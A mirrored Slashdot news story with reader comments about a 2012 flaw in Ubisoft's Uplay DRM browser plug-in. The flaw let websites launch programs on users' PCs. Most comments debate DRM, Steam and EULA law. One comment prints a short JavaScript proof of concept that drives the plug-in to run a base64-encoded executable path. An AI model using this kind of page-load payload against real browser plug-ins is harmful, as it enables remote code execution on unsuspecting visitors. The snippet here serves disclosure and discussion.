Slashdot Mirror

← Back to Stories (view on slashdot.org)

Ubisoft Uplay DRM Found To Include a Rootkit

Posted by samzenpus on from the a-little-something-extra dept.

An anonymous reader writes "It has been discovered that the Uplay system Ubisoft uses to both check a game is legal and offer up gaming achievements, multiplayer, and additional content, actually contains a rootkit. The discovery was made by Tavis Ormandy, an information security engineer at Google, when he installed Assassin's Creed: Revelations on his laptop. He noticed that during the installation Uplay installed a browser plug-in that allows any website to gain access to your machine through a backdoor and take control of it.The plug-in can be classed as a rootkit because it is thought to allow continued privileged access to a machine without a user's consent."
Update: Ubisoft has released a statement saying it has issued a forced patch to correct the flaw in the browser plug-in for the Uplay PC application.

26 of 473 comments (clear)

  1. under the DMCA any antivirus software can get sued by Joe_Dragon · · Score: 5, Interesting

    under the DMCA any antivirus software companies can get sued for remove or even marking this.

  2. Not really surprising. by Black+LED · · Score: 5, Insightful

    It's reasons like this that I refuse to buy anything from Ubisoft.

    1. Re:Not really surprising. by afidel · · Score: 5, Insightful

      Yep, I own every HoMM game except VI due to the retarded DRM. I wish Steam had a filter button to remove anything with third party DRM so I wouldn't have to get my hopes up just to end up not buying a title due to publisher stupidity.

      --
      There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order. Starting now.
    2. Re:Not really surprising. by Polizei · · Score: 5, Funny

      It's reasons like this I refuse to install any closed source binaries - besides the inbound and outbound firewall...

    3. Re:Not really surprising. by gman003 · · Score: 5, Insightful

      I've said this before: DRM, in and of itself, is not evil.

      If all the DRM does is check whether I have or have not purchased the [whatever], and reliably detects paying users as such (low false-positive rate; the false-negative rate is meaningless to me), and the only thing it does is conditionally run (or not run) the [whatever], and it requires minimal work on my own part, I'm fine with it. And, it seems, many others are fine with it as well.

      Now, many, even most, DRM implementations fail at least one of those evilness checks. This Ubisoft one violates the "don't do anything on the system not related to your product" clause. Many others fail the "reliably detect paying users as such" clause - always-online systems detect offline-but-paying users as nonpaying, for instance.

      Steam passes the evilness checks with only a few caveats (it's not perfect, but it's one of the better ones, and probably the best with that level and quantity of games). You will have to go online at least once to authenticate, you need to prepare a bit ahead of time before going offline (random internet dropouts or the Steam servers themselves going down can stop you), and it does encrypt pre-loaded games. And then there's the whole "no reselling/used games" thing, but honestly, I'm fine with that. I've never found selling my old games to be financially worth it, and the very phrase "used digital games" is an absurdity.

    4. Re:Not really surprising. by xaoslaad · · Score: 5, Informative

      Steam doesn't limit the number of installs I can perform. It doesn't require me to be always online. It doesn't stop me from running games under wine[1]. It doesn't restrict me to only one or a few downloads of my purchase. Steam may be DRM, but as things go it is pretty reasonable.

      I have had games limit me to 10 installs. Games with cruddy DRM that can't possibly function under wine. Others let me only download them once. I have fortunately never had to deal with the always online crap, unless by its very nature it was necessary for the game (MMORPG's, for example).

      [1] Yes, I actually game using wine, so that is of value to me. I only run Linux at home. It's a pain in the butt for gaming, but it's how I do it.

    5. Re:Not really surprising. by Baloroth · · Score: 5, Insightful

      You'd like Steam - a DRM system - to help you buy only DRMed games that don't use a competing DRM system?

      People really have drunk the Steam kool-aid, haven't they?

      Yes, because unlike every other DRM system I've ever seen, Steam actually helps to improve the experience, by making sure the game is up-to-date, storing saves and config files in the "cloud" (for developers who implement it), allowing me to re-download and re-install games on as many computers as I please, allowing me to easily play with friends (or not, as I see fit), and still allowing me to play games offline (unlike *ahem* Blizzard). And of course their famous sales. I know people who dislike Valve who still like Steam. Granted, the DRM isn't necessary for all that technically speaking, but it is to provide a decent selection (most developers wouldn't put their games on Steam if it didn't have copy-protection of some kind).

      Honestly, Steam is almost always as easier, sometimes more, than pirating games.

      --
      "None can love freedom heartily, but good men; the rest love not freedom, but license." --John Milton
  3. Is anyone actually surprised? by h4rr4r · · Score: 5, Insightful

    Who is actually surprised?

    This is the one thing that has me worried about Steam on linux. Using it in wine I can be fairly sure I have it limited to one user account and no real ability to mess with the machine, but when it installs natively who knows.

  4. That's awesome by the_Bionic_lemming · · Score: 5, Interesting

    I started boycotting several manufacturers over the games that required a constant online connection. I can't wait to tell my buddy that thinks that the boycott is stupid how his system is rooted (again)!

    --
    _ _ _ Go for the eyes Boo! GO FOR THE EYES!
  5. Re:under the DMCA any antivirus software can get s by MarioMax · · Score: 5, Insightful

    under the DMCA any antivirus software companies can get sued for remove or even marking this.

    On the other hand, Ubisoft is probably guilty of violating Federal wiretap laws.

  6. Re:Enough with giving Windows a pass by h4rr4r · · Score: 5, Insightful

    This is software installed by the user on purpose, it is no flaw in windows that allowed it in. You could write software to do the same thing on any number of OSes.

    I am no windows fan, but you can't blame them for this.

  7. The post: by Fwipp · · Score: 5, Informative

    Because it's missing from the summary and also the linked article, here's the initial report: http://seclists.org/fulldisclosure/2012/Jul/375

  8. Re:under the DMCA any antivirus software can get s by Anonymous Coward · · Score: 5, Insightful

    You can't always waive your rights, even if you agree to it.

  9. Not a rootkit, but... by Kdansky · · Score: 5, Informative

    Technically, rootkit is the wrong term. It doesn't insert itself into the system, and it cannot execute code with privileges. It's still a security hole big enough to swallow small countries.

  10. Re:All DRM is rootkit by Anonymous Coward · · Score: 5, Insightful

    IMHO ANY software that allows someone to delete/alter/lock up something on my machine without my permission is essentially a rootkit.

    DRM does not allow someone to "delete/alter" anything. It only "locks up" in the crypto sense, as DRM is basically crypto code. I dislike DRM, but will defend a software company's right to encrypt their software, and even allow them to require an Internet connection to "unlock/decrypt" that software so that it can be used. This is their choice, and in that respect, "buyer beware". Vote with your cash.

    OTOH, installing a rootkit which allows possible unauthorised access to my machine, by the company or any other 3rd party without specific permission for each and every access??? They deserve to be fined out of existence by every legal system on the planet.

  11. Re:under the DMCA any antivirus software can get s by thePowerOfGrayskull · · Score: 5, Informative

    In what way?
    You really think they did not include some fine print in the EULA about how the user was consenting to this?

    An illegal action (not sure if this is or not) remains illegal, even if both parties agree to it.

  12. And they wonder... by mycroft16 · · Score: 5, Insightful

    And they wonder why there is piracy of video games. Seems quite obvious to me. "Buy game and get a rootkit installed on my machine, compromising my system's security or get the game from pirates without that."

  13. Re:under the DMCA any antivirus software can get s by History's+Coming+To · · Score: 5, Informative

    Correct, in the UK at least, not sure about US law. For example, even if I agreed to work for less than minimum wage the employer is still breaking the law if they don't pay minimum wage, you can't sign away your legal rights. Also, they could be leaving themselves open to even bigger trouble - it could be argued that by doing this Ubisoft have taken responsibility for anything placed on the computer as a result and could be held legally responsible for anything found on it, such as malware or child porn.

    --
    Please consider this account deleted, I just can't be bothered with the spam anymore.
  14. The evil JS: by nthitz · · Score: 5, Informative

    var x = document.createElement('OBJECT');
    x.setAttribute("type", "application/x-uplaypc");
    document.body.appendChild(x);
    x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")

  15. Re:under the DMCA any antivirus software can get s by Anonymous Coward · · Score: 5, Insightful

    So? Ubisoft is a corporation, its not like anything bad is actually going to happen to them.

  16. Re:No wonder game sales are slumping... by dc29A · · Score: 5, Informative

    Game sales are down for consoles maybe. With a bit of googling, you might find silly things like NVidia's 23% revenue growth attributed to PC gaming alone. And of course that Steam has 100% sales growth in 2012 over 2011. Oh and Diablo III selling like hotcakes. But hey, this profit growth is all because DRM is making people NOT buy games right?

  17. Re:Enough with giving Windows a pass by SharpFang · · Score: 5, Insightful

    Wait, not really.

    You install a computer game
    The game claims to install counterfeiting and cheat protection
    What you also get in the bundle without consenting is a backdoor/rootkit

    This is the very definition of a trojan.

    --
    45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B2
  18. uPlay just updated by derfy · · Score: 5, Informative

    uPlay update 2.0.4: 'Fix addressing browser plugin. Plugin now only able to open uPlay application.'

    Well, that was fast.

  19. Re:under the DMCA any antivirus software can get s by Dunbal · · Score: 5, Informative

    You mean the EULA you are forced to agree to AFTER making the purchase? Null and void.

    --
    Seven puppies were harmed during the making of this post.
  20. Re:under the DMCA any antivirus software can get s by wvmarle · · Score: 5, Insightful

    In most if not all jurisdictions in this world, the law is always above any contract or agreement. And rightfully so, just think of the mess we would have if that is not the case. It's also why in all proper contracts you will find a "survivability clause", stating that if anything in the contract is overruled by another law, that the rest of the contract remains in force.

  21. Re:under the DMCA any antivirus software can get s by Hatta · · Score: 5, Informative

    Which is a perfect example of how the rich and powerful live by a different set of laws. If I put a root kit on Sony's computer, you'd better believe I'd have felony charges filed against me. If Sony puts a root kit on my computer, all they have to do is pay off some state AGs.

    --
    Give me Classic Slashdot or give me death!